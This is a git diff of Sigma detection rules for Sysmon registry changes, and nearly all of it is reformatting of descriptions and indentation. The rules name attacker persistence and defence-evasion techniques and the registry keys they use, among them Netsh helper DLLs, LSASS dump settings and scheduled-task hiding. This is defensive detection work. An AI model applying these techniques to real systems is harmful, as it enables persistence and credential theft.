a/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml @@ -1,8 +1,7 @@ title: Enabling COR Profiler Environment Variables id: ad89044a-8f49-4673-9a55-cbd88a1b374f status: test -description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and - "cor_profiler" variables being set and configured. +description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. references: - https://twitter.com/jamieantisocial/status/1304520651248668673 - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors diff --git a/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml index adc161c11..f42a8e5a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml @@ -1,8 +1,7 @@ title: Scripted Diagnostics Turn Off Check Enabled - Registry id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 status: experimental -description: Detects enabling TurnOffCheck which can be used to bypass defense of - MSDT Follina vulnerability +description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability references: - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw author: Christopher Peacock @securepeacock, SCYTHE @scythe_io diff --git a/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml index ffa62eaf7..d2a8fe617 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml @@ -1,9 +1,7 @@ title: Potential EventLog File Location Tampering id: 0cb8d736-995d-4ce7-a31e-1e8d452a1459 status: experimental -description: Detects tampering with EventLog service "file" key. In order to change - the default location of an Evtx file. This technique is used to tamper with log - collection and alerting +description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting references: - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key author: D3F7A5105 diff --git a/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml index 425ef83eb..1895d76f0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml @@ -1,8 +1,7 @@ title: Suspicious Application Allowed Through Exploit Guard id: 42205c73-75c8-4a63-9db1-e3782e06fda0 status: experimental -description: Detects applications being added to the "allowed applications" list of - exploit guard in order to bypass controlled folder settings +description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings references: - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_key: - TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender - Exploit Guard\Controlled Folder Access\AllowedApplications + TargetObject|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications selection_paths: TargetObject|contains: + # Add more paths you don't allow in your org - \Users\Public\ - \AppData\Local\Temp\ - \Desktop\ diff --git a/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml b/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml index 25e2e63c9..4df72c119 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml @@ -1,8 +1,7 @@ title: Change User Account Associated with the FAX Service id: e3fdf743-f05b-4051-990a-b66919be1743 status: test -description: Detect change of the user account associated with the FAX service to - avoid the escalation problem. +description: Detect change of the user account associated with the FAX service to avoid the escalation problem. references: - https://twitter.com/dottor_morte/status/1544652325570191361 - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf diff --git a/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml b/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml index ba09b241b..276e0fecf 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml @@ -24,7 +24,7 @@ detection: - \Software\Microsoft\Fax\Device Providers\ - \ImageName filter: - Details: '%systemroot%\system32\fxst30.dll' + Details: '%systemroot%\system32\fxst30.dll' # Windows 10 condition: registry_set and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml b/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml index cb82d42dd..5c1a09703 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml @@ -1,8 +1,7 @@ title: New File Association Using Exefile id: 44a22d59-b175-4f13-8c16-cbaef5b581ff status: test -description: Detects the abuse of the exefile handler in new file association. Used - for bypass of security products. +description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. references: - https://twitter.com/mrd0x/status/1461041276514623491 author: Andreas Hunkeler (@Karneades) diff --git a/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml index c544bae74..3695e7e54 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml @@ -1,8 +1,7 @@ title: Add Debugger Entry To Hangs Key For Persistence id: 833ef470-fa01-4631-a79b-6f291c9ac498 status: experimental -description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key - in order to achieve persistence which will get invoked when an application crashes +description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes references: - https://persistence-info.github.io/Data/wer_debugger.html - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml index 3e16fb84e..ef8049e58 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via Hhctrl.ocx id: f10ed525-97fe-4fed-be7c-2feecca941b1 status: experimental -description: Detects when an attacker modifies the registry value of the "hhctrl" - to point to a custom binary +description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary references: - https://persistence-info.github.io/Data/hhctrl.html - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml index 55f5aa588..b79a1d7ea 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml @@ -1,8 +1,7 @@ title: Modification of Explorer Hidden Keys id: 5a5152f1-463f-436b-b2f5-8eceb3964b42 status: experimental -description: Detects modifications to the hidden files keys in registry. This technique - is abused by several malware families to hide their files from normal users. +description: Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml index cf1907b80..b8e8f52b9 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml @@ -1,8 +1,7 @@ title: Registry Hide Function from User id: 5a93eb65-dffa-4543-b761-94aa60098fb6 status: test -description: Detects registry modifications that hide internal tools or functions - from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) +description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml index c75084ea5..e41bea0e8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml @@ -1,18 +1,14 @@ title: Hide Schedule Task Via Index Value Tamper id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61 related: - - id: acd74772-5f88-45c7-956b-6a7b36c294d2 - type: similar - - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec - type: similar + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + type: similar + - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec + type: similar status: experimental -description: 'Detects when the "index" value of a scheduled task is modified from - the registry - - Which effectively hides it from any tooling such as "schtasks /query" (Read the - referenced link for more information about the effects of this technique) - - ' +description: | + Detects when the "index" value of a scheduled task is modified from the registry + Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml index 62ed8bead..564e2f1d7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml @@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 related: - - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 - type: similar + - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 diff --git a/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml index 4359585cc..523a27bd3 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml @@ -1,21 +1,13 @@ title: Uncommon Extension In Keyboard Layout IME File Registry Value id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 related: - - id: 9d8f9bb8-01af-4e15-a3a2-349071530530 - type: derived + - id: 9d8f9bb8-01af-4e15-a3a2-349071530530 + type: derived status: experimental -description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature, - which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST - message. - - Before doing this, the client needs to register the DLL in a special registry - key that is assumed to implement this keyboard layout. This registry key should - store a value named "Ime File" with a DLL path. - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. - - ' +description: | + Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. + Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. + IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. references: - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ author: X__Junior (Nextron Systems) @@ -39,7 +31,6 @@ detection: Details|endswith: .ime condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. + - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml index b6e071c3e..3e4eef3f6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml @@ -1,21 +1,13 @@ title: Suspicious Path In Keyboard Layout IME File Registry Value id: 9d8f9bb8-01af-4e15-a3a2-349071530530 related: - - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 - type: derived + - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 + type: derived status: experimental -description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature, - which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST - message. - - Before doing this, the client needs to register the DLL in a special registry - key that is assumed to implement this keyboard layout. This registry key should - store a value named "Ime File" with a DLL path. - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. - - ' +description: | + Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. + Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. + IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. references: - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ author: X__Junior (Nextron Systems) @@ -44,15 +36,15 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_folders_2: - - Details|contains|all: - - :\Users\ - - \Favorites\ - - Details|contains|all: - - :\Users\ - - \Favourites\ - - Details|contains|all: - - :\Users\ - - \Contacts\ + - Details|contains|all: + - :\Users\ + - \Favorites\ + - Details|contains|all: + - :\Users\ + - \Favourites\ + - Details|contains|all: + - :\Users\ + - \Contacts\ condition: registry_set and (selection_registry and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml index 801e0c4e0..cd40b7b8d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml @@ -1,8 +1,7 @@ title: New Root or CA or AuthRoot Certificate to Store id: d223b46b-5621-4037-88fe-fda32eead684 status: experimental -description: Detects the addition of new root, CA or AuthRoot certificates to the - Windows registry +description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store - https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec diff --git a/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml b/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml index 03a06c3aa..c4bf85d27 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml @@ -1,11 +1,8 @@ title: Internet Explorer DisableFirstRunCustomize Enabled id: ab567429-1dfb-4674-b6d2-979fd2f9d125 status: experimental -description: 'Detects changes to the Internet Explorer "DisableFirstRunCustomize" - value, which prevents Internet Explorer from running the first run wizard the - first time a user starts the browser after installing Internet Explorer or Windows. - - ' +description: | + Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ @@ -26,15 +23,14 @@ detection: selection: TargetObject|endswith: \Microsoft\Internet Explorer\Main\DisableFirstRunCustomize Details: - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000001) # Home Page + - DWORD (0x00000002) # Welcome To IE filter_main_generic: Image: - C:\Windows\explorer.exe - C:\Windows\System32\ie4uinit.exe condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - As this is controlled by group policy as well as user settings. Some false positives - may occur. + - As this is controlled by group policy as well as user settings. Some false positives may occur. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml b/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml index 312e23976..5a94b5513 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml @@ -1,9 +1,7 @@ title: Potential Ransomware Activity Using LegalNotice Message id: 8b9606c9-28be-4a38-b146-0e313cc232c1 status: experimental -description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry - values where the message set contains keywords often used in ransomware ransom - messages +description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml b/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml index 8cedb9c36..c45a93ad5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml @@ -1,13 +1,9 @@ title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d status: experimental -description: 'Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download - a file from the Internet without executing any - - anomalous executables with suspicious arguments. The downloaded file will be in - C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json - - ' +description: | + Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any + anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json references: - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml b/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml index 4b754b53b..79edd5823 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml @@ -1,19 +1,13 @@ title: RestrictedAdminMode Registry Value Tampering id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 related: - - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 - type: similar + - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation + type: similar status: experimental -description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order - to disable or enable RestrictedAdmin mode. - - RestrictedAdmin mode prevents the transmission of reusable credentials to the - remote system to which you connect using Remote Desktop. - - This prevents your credentials from being harvested during the initial connection - process if the remote server has been compromise - - ' +description: | + Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. + RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. + This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise references: - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx diff --git a/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml b/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml index c25aaa697..2cec99ed7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml @@ -1,9 +1,7 @@ title: Lsass Full Dump Request Via DumpType Registry Settings id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 status: experimental -description: Detects the setting of the "DumpType" registry value to "2" which stands - for a "Full Dump". Technique such as LSASS Shtinkering requires this value to - be "2" in order to dump LSASS. +description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps @@ -26,7 +24,7 @@ detection: TargetObject|contains: - \SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType - \SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType - Details: DWORD (0x00000002) + Details: DWORD (0x00000002) # Full Dump condition: registry_set and selection falsepositives: - Legitimate application that needs to do a full dump of their process diff --git a/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml b/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml index 7038c0bfd..69c4077f4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml @@ -1,8 +1,8 @@ title: Adwind RAT / JRAT - Registry id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 related: - - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 - type: derived + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: diff --git a/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml b/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml index d5fa8fcc0..66958202f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird - Registry id: 92b0b372-a939-44ed-a11b-5136cf680e27 related: - - id: c3198a27-23a0-4c2c-af19-e5328d49680e - type: derived + - id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: diff --git a/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml b/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml index cd22852a9..dc08ae21d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml @@ -1,17 +1,10 @@ title: NET NGenAssemblyUsageLog Registry Key Tamper id: 28036918-04d3-423d-91c0-55ecf99fb892 status: experimental -description: 'Detects changes to the NGenAssemblyUsageLog registry key. - - .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog - CLR configuration knob in the Registry or by configuring an environment variable - (as described in the next section). - - By simplify specifying an arbitrary value (e.g. fake output location or junk data) - for the expected value, a Usage Log file for the .NET execution context will not - be created. - - ' +description: | + Detects changes to the NGenAssemblyUsageLog registry key. + .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). + By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. references: - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml b/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml index 12d00f041..7bdb57f34 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml @@ -1,16 +1,13 @@ title: New Netsh Helper DLL Registered From A Suspicious Location id: e7b18879-676e-4a0e-ae18-27039185a8e7 related: - - id: 56321594-9087-49d9-bf10-524fe8479452 - type: similar - - id: c90362e0-2df3-4e61-94fe-b37615814cb1 - type: similar + - id: 56321594-9087-49d9-bf10-524fe8479452 + type: similar + - id: c90362e0-2df3-4e61-94fe-b37615814cb1 + type: similar status: experimental -description: 'Detects changes to the Netsh registry key to add a new DLL value that - is located on a suspicious location. This change might be an indication of a potential - persistence attempt by adding a malicious Netsh helper - - ' +description: | + Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper references: - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ @@ -37,18 +34,18 @@ detection: - \AppData\Local\Temp\ - \Temporary Internet selection_folders_2: - - Details|contains|all: - - :\Users\ - - \Favorites\ - - Details|contains|all: - - :\Users\ - - \Favourites\ - - Details|contains|all: - - :\Users\ - - \Contacts\ - - Details|contains|all: - - :\Users\ - - \Pictures\ + - Details|contains|all: + - :\Users\ + - \Favorites\ + - Details|contains|all: + - :\Users\ + - \Favourites\ + - Details|contains|all: + - :\Users\ + - \Contacts\ + - Details|contains|all: + - :\Users\ + - \Pictures\ condition: registry_set and (selection_target and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml index 17ea1511c..f6abdce90 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Netsh Helper DLL - Registry id: c90362e0-2df3-4e61-94fe-b37615814cb1 related: - - id: 56321594-9087-49d9-bf10-524fe8479452 - type: similar - - id: e7b18879-676e-4a0e-ae18-27039185a8e7 - type: similar + - id: 56321594-9087-49d9-bf10-524fe8479452 + type: similar + - id: e7b18879-676e-4a0e-ae18-27039185a8e7 + type: similar status: experimental -description: 'Detects changes to the Netsh registry key to add a new DLL value. This - change might be an indication of a potential persistence attempt by adding a malicious - Netsh helper - - ' +description: | + Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper references: - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml b/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml index 50b30adde..93b290fb1 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml @@ -1,8 +1,7 @@ title: New Application in AppCompat id: 60936b49-fca0-4f32-993d-7415edcf9a5d status: test -description: A General detection for a new application in AppCompat. This indicates - an application executing for the first time on an endpoint. +description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/1 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md @@ -24,8 +23,7 @@ detection: TargetObject|contains: \AppCompatFlags\Compatibility Assistant\Store\ condition: registry_set and selection falsepositives: - - This rule is to explore new applications on an endpoint. False positives depends - on the organization. + - This rule is to explore new applications on an endpoint. False positives depends on the organization. - Newly setup system. - Legitimate installation of new application. level: informational diff --git a/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml b/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml index 5955c505d..94f257463 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml +++ 